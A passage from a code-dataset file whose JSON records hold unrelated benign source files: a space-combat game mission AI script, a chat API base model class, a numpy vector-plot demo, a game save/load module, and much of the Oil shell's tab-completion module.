112)\n\tpStayBoyStay = App.PlainAI_Create(pShip, \"StayBoyStay\")\n\tpStayBoyStay.SetScriptModule(\"Stay\")\n\tpStayBoyStay.SetInterruptable(1)\n\t# Done creating PlainAI StayBoyStay\n\t#########################################\n\t#########################################\n\t# Creating ConditionalAI GalorsNotClose at (116, 171)\n\t## Conditions:\n\t#### Condition GalorsInRange\n\tpGalorsInRange = App.ConditionScript_Create(\"Conditions.ConditionInRange\", \"ConditionInRange\", 400, pShip.GetName(), \"Galor 1\", \"Galor 2\")\n\t## Evaluation function:\n\tdef EvalFunc(bGalorsInRange):\n\t\tACTIVE = App.ArtificialIntelligence.US_ACTIVE\n\t\tDORMANT = App.ArtificialIntelligence.US_DORMANT\n\t\tDONE = App.ArtificialIntelligence.US_DONE\n\t\tif bGalorsInRange:\n\t\t\treturn DONE\n\t\treturn ACTIVE\n\t## The ConditionalAI:\n\tpGalorsNotClose = App.ConditionalAI_Create(pShip, \"GalorsNotClose\")\n\tpGalorsNotClose.SetInterruptable(1)\n\tpGalorsNotClose.SetContainedAI(pStayBoyStay)\n\tpGalorsNotClose.AddCondition(pGalorsInRange)\n\tpGalorsNotClose.SetEvaluationFunction(EvalFunc)\n\t# Done creating ConditionalAI GalorsNotClose\n\t#########################################\n\t#########################################\n\t# Creating CompoundAI AttackGalors at (162, 218)\n\timport AI.Compound.BasicAttack\n\tpAttackGalors = AI.Compound.BasicAttack.CreateAI(pShip, \"Galor 1\", \"Galor 2\", Difficulty = 0.2)\n\t# Done creating CompoundAI AttackGalors\n\t#########################################\n\t#########################################\n\t# Creating SequenceAI Sequence at (15, 262)\n\tpSequence = App.SequenceAI_Create(pShip, \"Sequence\")\n\tpSequence.SetInterruptable(1)\n\tpSequence.SetLoopCount(1)\n\tpSequence.SetResetIfInterrupted(1)\n\tpSequence.SetDoubleCheckAllDone(0)\n\tpSequence.SetSkipDormant(0)\n\t# SeqBlock is at (130, 265)\n\tpSequence.AddAI(pGalorsNotClose)\n\tpSequence.AddAI(pAttackGalors)\n\t# Done creating SequenceAI Sequence\n\t#########################################\n\t#########################################\n\t# Creating PreprocessingAI RedAlert at (12, 308)\n\t## Setup:\n\timport AI.Preprocessors\n\tpScript = AI.Preprocessors.AlertLevel(App.ShipClass.RED_ALERT)\n\t## The PreprocessingAI:\n\tpRedAlert = App.PreprocessingAI_Create(pShip, \"RedAlert\")\n\tpRedAlert.SetInterruptable(1)\n\tpRedAlert.SetPreprocessingMethod(pScript, \"Update\")\n\tpRedAlert.SetContainedAI(pSequence)\n\t# Done creating PreprocessingAI RedAlert\n\t#########################################\n\t#########################################\n\t# Creating PreprocessingAI AvoidObstacles at (13, 355)\n\t## Setup:\n\timport AI.Preprocessors\n\tpScript = AI.Preprocessors.AvoidObstacles()\n\t## The PreprocessingAI:\n\tpAvoidObstacles = App.PreprocessingAI_Create(pShip, \"AvoidObstacles\")\n\tpAvoidObstacles.SetInterruptable(1)\n\tpAvoidObstacles.SetPreprocessingMethod(pScript, \"Update\")\n\tpAvoidObstacles.SetContainedAI(pRedAlert)\n\t# Done creating PreprocessingAI AvoidObstacles\n\t#########################################\n\treturn pAvoidObstacles\n","sub_path":"scripts/Maelstrom/Episode2/E2M2/E2M2_AI_MarauderAttack.py","file_name":"E2M2_AI_MarauderAttack.py","file_ext":"py","file_size_in_byte":3019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"46414218","text":"'''\n@Author: hua\n@Date: 2019-02-10 09:55:10\n@LastEditors: hua\n@LastEditTime: 2019-05-24 15:40:23\n'''\n''' author:hua\n date:2018.2.6\n 基础模型,封装一些基础方法 \n'''\nimport logging\nfrom app.Vendor.Code import Code\n\nclass Base():\n\n \"\"\" \n * 格式化分页\n * @param int page\n * @param int size\n * @param int total\n * @return dict \n \"\"\"\n @staticmethod\n def formatPaged(page, size, total):\n if int(total) > int(page) * int(size):\n more = 1\n else:\n more = 0\n return {\n 'total': int(total),\n 'page': int(page),\n 'size': int(size),\n 'more': more\n }\n\n \"\"\" \n * 格式化返回体\n * @param dict data\n * @return dict\n \"\"\"\n @staticmethod\n def formatBody(data={}, msg='', show=True):\n dataformat = {}\n dataformat['error_code'] = Code.SUCCESS\n dataformat['data'] = data\n dataformat['msg'] = msg\n dataformat['show'] = show\n return dataformat\n\n \"\"\" \n * 格式化错误返回体\n * @param int code\n * @param string message\n * @return dict\n \"\"\"\n @staticmethod\n def formatError(code, message='', show=True):\n if code == Code.BAD_REQUEST:\n message = 'Bad request.'\n elif code == Code.NOT_FOUND:\n message = 'No result matched.'\n body = {}\n body['error'] = True\n body['error_code'] = Code.BAD_REQUEST\n body['msg'] = message\n body['show'] = show\n return body\n\n\n\n\n","sub_path":"chatApi/app/Models/Base.py","file_name":"Base.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"133082395","text":"# 벡터 뺼셈\nimport numpy as np\nimport matplotlib.pyplot as plt\n\na = np.array([4, 1])\nb = np.array([-2, 3])\n\nprint(a - b)\n\nprint()\n\nprint(np.subtract(a, b))\n\nprint()\n\nsub = a - b\n\nfig = plt.figure()\nax = fig.add_subplot(1, 1, 1)\n\n# 원점에서 시작하도록 벡터 a를 그립니다.\nax.quiver(0, 0, a[0], a[1], angles='xy', scale_units='xy', scale=1)\nax.text(a[0], a[1], \"a\", size=15)\n\n# 벡터 a의 끝점에서 시작하는 바대 방향의 벡터 b를 그립니다.\nax.quiver(a[0], a[1], -b[0], -b[1], angles='xy', scale_units='xy', scale=1)\nax.text(a[0] - b[0], a[1] - b[1], \"-b\", size=15)\n\n# 두 벡터의 뺄셈 결과를 그려보면 벡터 a의 시작점과 벡터 b의 끝점을 잇는 선입니다.\nax.quiver(0, 0, sub[0], sub[1], angles='xy', scale_units='xy', scale=1, color='red')\nax.text(sub[0] * 0.5 + 0.3, sub[1] * 0.5, \"a - b\", size=15, color='red')\n\nax.set_xticks(range(-2, 8))\nax.set_yticks(range(-4, 5))\nax.grid()\nax.set_axisbelow(True)\nax.set_aspect('equal', adjustable='box')\n\nax.spines['left'].set_position('zero')\nax.spines['bottom'].set_position('zero')\nax.spines['right'].set_color('none')\nax.spines['top'].set_color('none')\n\nplt.show()","sub_path":"선형대수 3일차/실습/matplotlibs8.py","file_name":"matplotlibs8.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"240992797","text":"import time\r\nimport sys\r\nfrom datetime import datetime\r\n\r\ndef save(playerName, playerState, playerLife):\r\n\tdate = '; {0}'.format(datetime.ctime(datetime.now()))\r\n\r\n\twith open('save.dat', 'w') as f:\r\n\t\tf.write('{0}\\nName: {1}\\nLevel: {2}\\nLife: {3}'.format(\r\n\t\t\tdate, playerName, playerState, playerLife))\r\n\r\ndef load():\r\n\tstateList = []\r\n\tstateDict = {}\r\n\r\n\twith open('save.dat', 'r') as f:\r\n\t\tstateList = f.readlines()\r\n\r\n\tfor line in stateList:\r\n\t\tif line is stateList[0]:\r\n\t\t\tcontinue\r\n\t\telse:\r\n\t\t\tdictVal = line.split(' ')\r\n\t\t\tstateDict[dictVal[0].strip(':')] = dictVal[1].strip('\\n')\r\n\r\n\treturn stateDict\r\n\r\nif __name__ == \"__main__\":\r\n\tsys.exit(0)","sub_path":"main.py3","file_name":"main.py3","file_ext":"py3","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"239341709","text":"#!/usr/bin/env python\n# Copyright 2016 Andy Chu. All rights reserved.\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n\"\"\"\ncompletion.py - Tab completion.\n\nArchitecture:\n\nCompletion should run in threads? For two reasons:\n\n- Completion can be slow -- e.g. completion for distributed resources\n- Because readline has a weird interface, and then you can implement\n \"iterators\" in C++ or oil. They just push onto a PIPE. Use a netstring\n protocol and self-pipe?\n- completion can be in another process anyway?\n\nDoes that mean the user code gets run in an entirely separate interpreter? The\nwhole lexer/parser/cmd_exec combo has to be thread-safe. Does it get a copy of\nthe same startup state?\n\nFeatures TODO:\n - complete flags after alias expansion\n - complete history expansions like zsh\n - complete flags for all builtins, using frontend/args.py?\n - might need a special error token\n\nbash note: most of this stuff is in pcomplete.c and bashline.c (4K lines!).\nUses ITEMLIST with a bunch of flags.\n\"\"\"\nfrom __future__ import print_function\n\nimport posix\nimport pwd\nimport time\n\nfrom core import ui\nfrom core import util\nfrom core.meta import (\n Id, REDIR_ARG_TYPES, syntax_asdl, runtime_asdl, types_asdl)\nfrom frontend import reader\nfrom pylib import os_path\nfrom osh import word\nfrom osh import state\n\nimport libc\n\ncommand_e = syntax_asdl.command_e\nword_part_e = syntax_asdl.word_part_e\nredir_e = syntax_asdl.redir_e\nvalue_e = runtime_asdl.value_e\nredir_arg_type_e = types_asdl.redir_arg_type_e\n\nlog = util.log\n\n\n# To quote completion candidates.\n# ! is for history expansion, which only happens interactively, but\n# completion only does too.\n# *?[] are for globs\n# {} are for brace expansion\n# ~ in filenames should be quoted\n#\n# TODO: Also escape tabs as \\t and newlines at \\n?\nSHELL_META_CHARS = r' ~`!$&|;()\\\"*?[]{}<>' + \"'\"\n\n\n\nclass _RetryCompletion(Exception):\n \"\"\"For the 'exit 124' protocol.\"\"\"\n pass\n\n\nCH_Break, CH_Other = xrange(2) # Character types\nST_Begin, ST_Break, ST_Other = xrange(3) # States\n\n# State machine definition.\n_TRANSITIONS = {\n # (state, char) -> (new state, emit span)\n (ST_Begin, CH_Break): (ST_Break, False),\n (ST_Begin, CH_Other): (ST_Other, False),\n\n (ST_Break, CH_Break): (ST_Break, False),\n (ST_Break, CH_Other): (ST_Other, True),\n\n (ST_Other, CH_Break): (ST_Break, True),\n (ST_Other, CH_Other): (ST_Other, False),\n}\n\ndef AdjustArg(arg, break_chars, argv_out):\n end_indices = [] # stores the end of each span\n state = ST_Begin\n last_i = 0\n for i, c in enumerate(arg):\n ch = CH_Break if c in break_chars else CH_Other\n state, emit_span = _TRANSITIONS[state, ch]\n if emit_span:\n end_indices.append(i)\n\n # Always emit a span at the end (even for empty string)\n end_indices.append(len(arg))\n\n begin = 0\n for end in end_indices:\n argv_out.append(arg[begin:end])\n begin = end\n\n\nclass NullCompleter(object):\n\n def Matches(self, comp):\n return []\n\n\n# NOTE: How to create temporary options? With copy.deepcopy()?\n# We might want that as a test for OVM. Copying is similar to garbage\n# collection in that you walk a graph.\n\n\n# These values should never be mutated.\n_DEFAULT_OPTS = {}\n_DO_NOTHING = (_DEFAULT_OPTS, NullCompleter())\n\n\nclass State(object):\n \"\"\"Stores the state of the CURRENT completion.\"\"\"\n\n def __init__(self):\n # For the IN-PROGRESS completion.\n self.currently_completing = False\n # should be SET to a COPY of the registration options by the completer.\n self.dynamic_opts = None\n\n\nclass Lookup(object):\n \"\"\"Stores completion hooks registered by the user.\"\"\"\n\n def __init__(self):\n # command name -> UserSpec\n # Pseudo-commands __first and __fallback are for -E and -D.\n self.lookup = {\n '__fallback': _DO_NOTHING,\n '__first': _DO_NOTHING,\n }\n\n # So you can register *.sh, unlike bash. List of (glob, [actions]),\n # searched linearly.\n self.patterns = []\n\n def __str__(self):\n return '' % self.lookup\n\n def PrintSpecs(self):\n \"\"\"For 'complete' without args.\"\"\"\n for name in sorted(self.lookup):\n base_opts, user_spec = self.lookup[name]\n print('%-15s %s %s' % (name, base_opts, user_spec))\n print('---')\n for pat, spec in self.patterns:\n print('%s = %s' % (pat, spec))\n\n def RegisterName(self, name, base_opts, user_spec):\n \"\"\"Register a completion action with a name.\n Used by the 'complete' builtin.\n \"\"\"\n self.lookup[name] = (base_opts, user_spec)\n\n def RegisterGlob(self, glob_pat, base_opts, user_spec):\n self.patterns.append((glob_pat, base_opts, user_spec))\n\n def GetFirstSpec(self):\n return self.lookup['__first']\n\n def GetSpecForName(self, argv0):\n \"\"\"\n Args:\n argv0: A finished argv0 to lookup\n \"\"\"\n user_spec = self.lookup.get(argv0) # NOTE: Could be ''\n if user_spec:\n return user_spec\n\n key = os_path.basename(argv0)\n actions = self.lookup.get(key)\n if user_spec:\n return user_spec\n\n for glob_pat, base_opts, user_spec in self.patterns:\n #log('Matching %r %r', key, glob_pat)\n if libc.fnmatch(glob_pat, key):\n return base_opts, user_spec\n\n # Nothing matched\n return self.lookup['__fallback']\n\n\nclass Api(object):\n\n def __init__(self, line='', begin=0, end=0):\n \"\"\"\n Args:\n index: if -1, then we're running through compgen\n \"\"\"\n self.line = line\n self.begin = begin\n self.end = end\n # NOTE: COMP_WORDBREAKS is initialized in Mem().\n\n # NOTE: to_complete could be 'cur'\n def Update(self, first='', to_complete='', prev='', index=0,\n partial_argv=None):\n \"\"\"Added after we've done parsing.\"\"\"\n self.first = first\n self.to_complete = to_complete\n self.prev = prev\n self.index = index # COMP_CWORD\n # COMP_ARGV and COMP_WORDS can be derived from this\n self.partial_argv = partial_argv or []\n\n def __repr__(self):\n \"\"\"For testing\"\"\"\n return '' % (self.line, self.begin, self.end)\n\n\n#\n# Actions\n#\n\nclass CompletionAction(object):\n \"\"\"Returns a list of words.\n\n Function\n Literal words\n \"\"\"\n def __init__(self):\n pass\n\n def Matches(self, comp):\n pass\n\n def __repr__(self):\n return self.__class__.__name__\n\n\nclass UsersAction(CompletionAction):\n \"\"\"complete -A user\"\"\"\n\n def Matches(self, comp):\n for u in pwd.getpwall():\n name = u.pw_name\n if name.startswith(comp.to_complete):\n yield name\n\n\nclass TestAction(CompletionAction):\n def __init__(self, words, delay=None):\n self.words = words\n self.delay = delay\n\n def Matches(self, comp):\n for w in self.words:\n if w.startswith(comp.to_complete):\n if self.delay:\n time.sleep(self.delay)\n yield w\n\n\nclass DynamicWordsAction(CompletionAction):\n \"\"\" compgen -W '$(echo one two three)' \"\"\"\n\n def __init__(self, word_ev, splitter, arg_word, arena):\n self.word_ev = word_ev\n self.splitter = splitter\n self.arg_word = arg_word\n self.arena = arena\n\n def Matches(self, comp):\n try:\n val = self.word_ev.EvalWordToString(self.arg_word)\n except util.FatalRuntimeError as e:\n ui.PrettyPrintError(e, self.arena)\n raise\n\n # SplitForWordEval() Allows \\ escapes\n candidates = self.splitter.SplitForWordEval(val.s)\n for c in candidates:\n if c.startswith(comp.to_complete):\n yield c\n\n\nclass FileSystemAction(CompletionAction):\n \"\"\"Complete paths from the file system.\n\n Directories will have a / suffix.\n \"\"\"\n def __init__(self, dirs_only=False, exec_only=False, add_slash=False):\n self.dirs_only = dirs_only\n self.exec_only = exec_only\n\n # This is for redirects, not for UserSpec, which should respect compopt -o\n # filenames.\n self.add_slash = add_slash # for directories\n\n def Matches(self, comp):\n to_complete = comp.to_complete\n i = to_complete.rfind('/')\n if i == -1: # it looks like 'foo'\n to_list = '.'\n base = ''\n elif i == 0: # it's an absolute path to_complete like / or /b\n to_list = '/'\n base = '/'\n else:\n to_list = to_complete[:i]\n base = to_list\n #log('to_list %r', to_list)\n\n try:\n names = posix.listdir(to_list)\n except OSError as e:\n return # nothing\n\n for name in names:\n path = os_path.join(base, name)\n if path.startswith(to_complete):\n if self.dirs_only: # add_slash not used here\n # NOTE: There is a duplicate isdir() check later to add a trailing\n # slash. Consolidate the checks for fewer stat() ops. This is hard\n # because all the completion actions must obey the same interface.\n # We could have another type like candidate = File | Dir |\n # OtherString ?\n if os_path.isdir(path):\n yield path\n continue\n\n if self.exec_only:\n # TODO: Handle exception if file gets deleted in between listing and\n # check?\n if not posix.access(path, posix.X_OK):\n continue\n\n if self.add_slash and os_path.isdir(path):\n yield path + '/'\n else:\n yield path\n\n\nclass ShellFuncAction(CompletionAction):\n \"\"\"Call a user-defined function using bash's completion protocol.\"\"\"\n\n def __init__(self, ex, func):\n self.ex = ex\n self.func = func\n\n def __repr__(self):\n # TODO: Add file and line number here!\n return '' % (self.func.name,)\n\n def log(self, *args):\n self.ex.debug_f.log(*args)\n\n def Matches(self, comp):\n # Have to clear the response every time. TODO: Reuse the object?\n state.SetGlobalArray(self.ex.mem, 'COMPREPLY', [])\n\n # New completions should use COMP_ARGV, a construct specific to OSH>\n state.SetGlobalArray(self.ex.mem, 'COMP_ARGV', comp.partial_argv)\n\n # Old completions may use COMP_WORDS. It is split by : and = to emulate\n # bash's behavior. \n # More commonly, they will call _init_completion and use the 'words' output\n # of that, ignoring COMP_WORDS.\n comp_words = []\n for a in comp.partial_argv:\n AdjustArg(a, [':', '='], comp_words)\n if comp.index == -1: # cmopgen\n comp_cword = comp.index\n else:\n comp_cword = len(comp_words) - 1 # weird invariant\n\n state.SetGlobalArray(self.ex.mem, 'COMP_WORDS', comp_words)\n state.SetGlobalString(self.ex.mem, 'COMP_CWORD', str(comp_cword))\n state.SetGlobalString(self.ex.mem, 'COMP_LINE', comp.line)\n state.SetGlobalString(self.ex.mem, 'COMP_POINT', str(comp.end))\n\n argv = [comp.first, comp.to_complete, comp.prev]\n self.log('Running completion function %r with arguments %s',\n self.func.name, argv)\n\n status = self.ex.RunFuncForCompletion(self.func, argv)\n if status == 124:\n self.log('Got status 124 from %r', self.func.name)\n raise _RetryCompletion()\n\n # Read the response. We set it above, so this error would only happen if\n # the user unset it.\n # NOTE: 'COMP_REPLY' would follow the naming convention!\n val = state.GetGlobal(self.ex.mem, 'COMPREPLY')\n if val.tag == value_e.Undef:\n util.error('Ran function %s but COMPREPLY was not defined',\n self.func.name)\n return []\n\n if val.tag != value_e.StrArray:\n log('ERROR: COMPREPLY should be an array, got %s', val)\n return []\n self.log('COMPREPLY %s', val)\n\n # Return this all at once so we don't have a generator. COMPREPLY happens\n # all at once anyway.\n return val.strs\n\n\nclass VariablesAction(CompletionAction):\n \"\"\"compgen -A variable.\"\"\"\n def __init__(self, mem):\n self.mem = mem\n\n def Matches(self, comp):\n for var_name in self.mem.VarNames():\n yield var_name\n\n\nclass ExternalCommandAction(CompletionAction):\n \"\"\"Complete commands in $PATH.\n\n This is PART of compge -A command.\n \"\"\"\n def __init__(self, mem):\n \"\"\"\n Args:\n mem: for looking up Path\n \"\"\"\n self.mem = mem\n # Should we list everything executable in $PATH here? And then whenever\n # $PATH is changed, regenerated it?\n # Or we can cache directory listings? What if the contents of the dir\n # changed?\n # Can we look at the dir timestamp?\n #\n # (dir, timestamp) -> list of entries perhaps? And then every time you hit\n # tab, do you have to check the timestamp? It should be cached by the\n # kernel, so yes.\n self.ext = []\n\n # (dir, timestamp) -> list\n # NOTE: This cache assumes that listing a directory is slower than statting\n # it to get the mtime. That may not be true on all systems? Either way\n # you are reading blocks of metadata. But I guess /bin on many systems is\n # huge, and will require lots of sys calls.\n self.cache = {}\n\n def Matches(self, comp):\n \"\"\"\n TODO: Cache is never cleared.\n\n - When we get a newer timestamp, we should clear the old one.\n - When PATH is changed, we can remove old entries.\n \"\"\"\n val = self.mem.GetVar('PATH')\n if val.tag != value_e.Str:\n # No matches if not a string\n return\n path_dirs = val.s.split(':')\n #log('path: %s', path_dirs)\n\n executables = []\n for d in path_dirs:\n try:\n st = posix.stat(d)\n except OSError as e:\n # There could be a directory that doesn't exist in the $PATH.\n continue\n key = (d, st.st_mtime)\n\n dir_exes = self.cache.get(key)\n if dir_exes is None:\n entries = posix.listdir(d)\n dir_exes = []\n for name in entries:\n path = os_path.join(d, name)\n # TODO: Handle exception if file gets deleted in between listing and\n # check?\n if not posix.access(path, posix.X_OK):\n continue\n dir_exes.append(name) # append the name, not the path\n\n self.cache[key] = dir_exes\n\n executables.extend(dir_exes)\n\n # TODO: Shouldn't do the prefix / space thing ourselves. readline does\n # that at the END of the line.\n for word in executables:\n if word.startswith(comp.to_complete):\n yield word\n\n\nclass GlobPredicate(object):\n \"\"\"Expand into files that match a pattern. !*.py filters them.\n\n Weird syntax:\n -X *.py or -X !*.py\n\n Also & is a placeholder for the string being completed?. Yeah I probably\n want to get rid of this feature.\n \"\"\"\n def __init__(self, include, glob_pat):\n self.include = include # True for inclusion, False for exclusion\n self.glob_pat = glob_pat # extended glob syntax supported\n\n def __call__(self, candidate):\n \"\"\"Should we INCLUDE the candidate or not?\"\"\"\n matched = libc.fnmatch(self.glob_pat, candidate)\n # This is confusing because of bash's double-negative syntax\n if self.include:\n return not matched\n else:\n return matched\n\n\nclass _DefaultPredicate(object):\n \"\"\"This is like lambda x: True, but it has a __repr__.\"\"\"\n def __call__(self, candidate):\n return True\n\n def __repr__(self):\n return ''\n\n\nDEFAULT_PREDICATE = _DefaultPredicate()\n\n\nclass UserSpec(object):\n \"\"\"The user configuration for completion.\n \n - The compgen builtin exposes this DIRECTLY.\n - Readline must call ReadlineCallback, which uses RootCompleter.\n \"\"\"\n def __init__(self, actions, extra_actions, else_actions, predicate,\n prefix='', suffix=''):\n self.actions = actions\n self.extra_actions = extra_actions\n self.else_actions = else_actions\n self.predicate = predicate # for -X\n self.prefix = prefix\n self.suffix = suffix\n\n def Matches(self, comp):\n \"\"\"Yield completion candidates.\"\"\"\n num_matches = 0\n\n # TODO: plusdirs could be in here, and doesn't respect predicate.\n # Fix that?\n for a in self.actions:\n is_fs_action = isinstance(a, FileSystemAction)\n for match in a.Matches(comp):\n # Special case hack to match bash for compgen -F. It doesn't filter by\n # to_complete!\n show = (\n self.predicate(match) and\n # ShellFuncAction results are NOT filtered by prefix!\n (match.startswith(comp.to_complete) or\n isinstance(a, ShellFuncAction))\n )\n\n # There are two kinds of filters: changing the string, and filtering\n # the set of strings. So maybe have modifiers AND filters? A triple.\n if show:\n yield self.prefix + match + self.suffix, is_fs_action\n num_matches += 1\n\n # NOTE: extra_actions and else_actions don't respect -X, -P or -S, and we\n # don't have to filter by startswith(comp.to_complete). They are all all\n # FileSystemActions, which do it already.\n\n # for -o plusdirs\n for a in self.extra_actions:\n for match in a.Matches(comp):\n yield match, True # We know plusdirs is a file system action\n\n # for -o default and -o dirnames\n if num_matches == 0:\n for a in self.else_actions:\n for match in a.Matches(comp):\n yield match, True # both are FileSystemAction\n\n # What if the cursor is not at the end of line? See readline interface.\n # That's OK -- we just truncate the line at the cursor?\n # Hm actually zsh does something smarter, and which is probably preferable.\n # It completes the word that\n\n def __str__(self):\n parts = ['(UserSpec']\n if self.actions:\n parts.append(str(self.actions))\n if self.extra_actions:\n parts.append('extra=%s' % self.extra_actions)\n if self.else_actions:\n parts.append('else=%s' % self.else_actions)\n if self.predicate is not DEFAULT_PREDICATE:\n parts.append('pred = %s' % self.predicate)\n if self.prefix:\n parts.append('prefix=%r' % self.prefix)\n if self.suffix:\n parts.append('suffix=%r' % self.suffix)\n return ' '.join(parts) + ')'\n\n\n# Helpers for Matches()\n\n# NOTE: We could add Lit_Dollar, but it would affect many lexer modes.\ndef IsDollar(t):\n return t.id == Id.Lit_Other and t.val == '$'\n\ndef IsDummy(t):\n return t.id == Id.Lit_CompDummy\n\n\nclass RootCompleter(object):\n \"\"\"Dispatch to various completers.\n\n - Complete the OSH language (variables, etc.), or\n - Statically evaluate argv and dispatch to a command completer.\n \"\"\"\n def __init__(self, word_ev, mem, comp_lookup, comp_state, parse_ctx,\n progress_f, debug_f):\n self.word_ev = word_ev # for static evaluation of words\n self.mem = mem # to complete variable names\n self.comp_lookup = comp_lookup\n self.comp_state = comp_state # to look up plugins\n\n self.parse_ctx = parse_ctx\n self.progress_f = progress_f\n self.debug_f = debug_f\n\n def Matches(self, comp):\n \"\"\"\n Args:\n comp: Callback args from readline. Readline uses set_completer_delims to\n tokenize the string.\n\n Returns a list of matches relative to readline's completion_delims.\n We have to post-process the output of various completers.\n \"\"\"\n arena = self.parse_ctx.arena # Used by inner functions\n\n self.parse_ctx.trail.Clear()\n line_reader = reader.StringLineReader(comp.line, self.parse_ctx.arena)\n c_parser = self.parse_ctx.MakeOshParser(line_reader, emit_comp_dummy=True)\n\n # We want the output from parse_ctx, so we don't use the return value.\n try:\n c_parser.ParseLogicalLine()\n except util.ParseError as e:\n # e.g. 'ls | ' will not parse. Now inspect the parser state!\n pass\n\n debug_f = self.debug_f\n trail = self.parse_ctx.trail\n if 1:\n trail.PrintDebugString(debug_f)\n\n # NOTE: We get Eof_Real in the command state, but not in the middle of a\n # BracedVarSub. This is due to the difference between the CommandParser\n # and WordParser.\n tokens = trail.tokens\n last = -1\n if tokens[-1].id == Id.Eof_Real:\n last -= 1 # ignore it\n\n try:\n t1 = tokens[last]\n except IndexError:\n t1 = None\n try:\n t2 = tokens[last-1]\n except IndexError:\n t2 = None\n\n debug_f.log('line: %r', comp.line)\n debug_f.log('rl_slice from byte %d to %d: %r', comp.begin, comp.end,\n comp.line[comp.begin:comp.end])\n\n debug_f.log('t1 %s', t1)\n debug_f.log('t2 %s', t2)\n\n def _MakePrefix(tok, offset=0):\n span = arena.GetLineSpan(tok.span_id)\n return comp.line[comp.begin : span.col+offset]\n #return comp.line[0 : span.col+offset]\n\n if t2: # We always have t1?\n if IsDollar(t2) and IsDummy(t1):\n prefix = _MakePrefix(t2, offset=1)\n for name in self.mem.VarNames():\n yield prefix + name\n return\n\n # echo ${\n if t2.id == Id.Left_VarSub and IsDummy(t1):\n prefix = _MakePrefix(t2, offset=2) # 2 for ${\n for name in self.mem.VarNames():\n yield prefix + name\n return\n\n # echo $P\n if t2.id == Id.VSub_DollarName and IsDummy(t1):\n # Example: ${undef:-$P\n # readline splits at ':' so we have to prepend '-$' to every completed\n # variable name.\n prefix = _MakePrefix(t2, offset=1) # 1 for $\n to_complete = t2.val[1:]\n for name in self.mem.VarNames():\n if name.startswith(to_complete):\n yield prefix + name\n return\n\n # echo ${P\n if t2.id == Id.VSub_Name and IsDummy(t1):\n prefix = _MakePrefix(t2) # no offset\n to_complete = t2.val\n for name in self.mem.VarNames():\n if name.startswith(to_complete):\n yield prefix + name\n return\n\n if t2.id == Id.Lit_ArithVarLike and IsDummy(t1):\n prefix = _MakePrefix(t2) # no offset\n to_complete = t2.val\n for name in self.mem.VarNames():\n if name.startswith(to_complete):\n yield prefix + name\n return\n\n # NOTE: Instead of looking at the column positions on line spans, we could\n # look for IsDummy() on the rightmost LiteralPart(token) of words.\n def LastColForWord(w):\n span_id = word.RightMostSpanForWord(w)\n span = arena.GetLineSpan(span_id)\n debug_f.log('span %s', span)\n debug_f.log('span col %d length %d', span.col, span.length)\n return span.col + span.length\n\n if trail.words:\n # First check if we're completing a path that begins with ~.\n #\n # Complete tilde like 'echo ~' and 'echo ~a'. This must be done at a word\n # level, and TildeDetectAll() does NOT help here, because they don't have\n # trailing slashes yet! We can't do it on tokens, because otherwise f~a\n # will complete. Looking at word_part is EXACTLY what we want.\n parts = trail.words[-1].parts\n if (len(parts) == 2 and\n parts[0].tag == word_part_e.LiteralPart and\n parts[1].tag == word_part_e.LiteralPart and\n parts[0].token.id == Id.Lit_TildeLike and\n parts[1].token.id == Id.Lit_CompDummy):\n t2 = parts[0].token\n\n # NOTE: We're assuming readline does its job, and not bothering to\n # compute the prefix. What are the incorrect corner cases?\n prefix = '~'\n to_complete = t2.val[1:]\n for u in pwd.getpwall():\n name = u.pw_name\n if name.startswith(to_complete):\n yield prefix + name + '/'\n return\n\n # Check if we should complete a redirect\n if trail.redirects:\n r = trail.redirects[-1]\n # Only complete 'echo >', but not 'echo >&' or 'cat <<'\n if (r.tag == redir_e.Redir and\n REDIR_ARG_TYPES[r.op.id] == redir_arg_type_e.Path):\n last_col = LastColForWord(r.arg_word)\n if last_col == comp.end:\n debug_f.log('Completing redirect arg')\n\n try:\n val = self.word_ev.EvalWordToString(r.arg_word)\n except util.FatalRuntimeError as e:\n debug_f.log('Error evaluating redirect word: %s', e)\n return\n if val.tag != value_e.Str:\n debug_f.log(\"Didn't get a string from redir arg\")\n return\n\n comp.Update(to_complete=val.s) # FileSystemAction uses only this\n action = FileSystemAction(add_slash=True)\n for name in action.Matches(comp):\n # TODO: form prefix from r.arg_word\n yield name\n return\n\n base_opts = None\n user_spec = None # Set below\n\n if trail.words:\n # Now check if we're completing a word!\n last_col = LastColForWord(trail.words[-1])\n debug_f.log('last_col for word: %d', last_col)\n if last_col == comp.end: # We're not completing the last word!\n debug_f.log('Completing words')\n #\n # It didn't look like we need to complete var names, tilde, redirects,\n # etc. Now try partial_argv, which may involve invoking PLUGINS.\n\n # needed to complete paths with ~\n words2 = word.TildeDetectAll(trail.words)\n if 0:\n debug_f.log('After tilde detection')\n for w in words2:\n print(w, file=debug_f)\n\n partial_argv = []\n for w in words2:\n try:\n # TODO:\n # - Should we call EvalWordSequence? But turn globbing off? It\n # can do splitting and such.\n # - We could have a variant to eval TildeSubPart to ~ ?\n val = self.word_ev.EvalWordToString(w)\n except util.FatalRuntimeError:\n # Why would it fail?\n continue\n if val.tag == value_e.Str:\n partial_argv.append(val.s)\n else:\n pass\n\n debug_f.log('partial_argv: %s', partial_argv)\n n = len(partial_argv)\n\n # TODO: Form prefix for RootCompleter to add to user_spec candidates\n if n == 0:\n # We should never get this because of Lit_CompDummy.\n raise AssertionError\n elif n == 1:\n # First\n base_opts, user_spec = self.comp_lookup.GetFirstSpec()\n else:\n base_opts, user_spec = self.comp_lookup.GetSpecForName(\n partial_argv[0])\n\n # Update the API for user-defined functions.\n index = len(partial_argv) - 1 # COMP_CWORD is -1 when it's empty\n prev = '' if index == 0 else partial_argv[index-1]\n comp.Update(first=partial_argv[0], to_complete=partial_argv[-1],\n prev=prev, index=index, partial_argv=partial_argv) \n\n # This happens in the case of [[ and ((, or a syntax error like 'echo < >'.\n if not user_spec:\n debug_f.log(\"Didn't find anything to complete\")\n return\n\n # Reset it back to what was registered. User-defined functions can mutate\n # it.\n 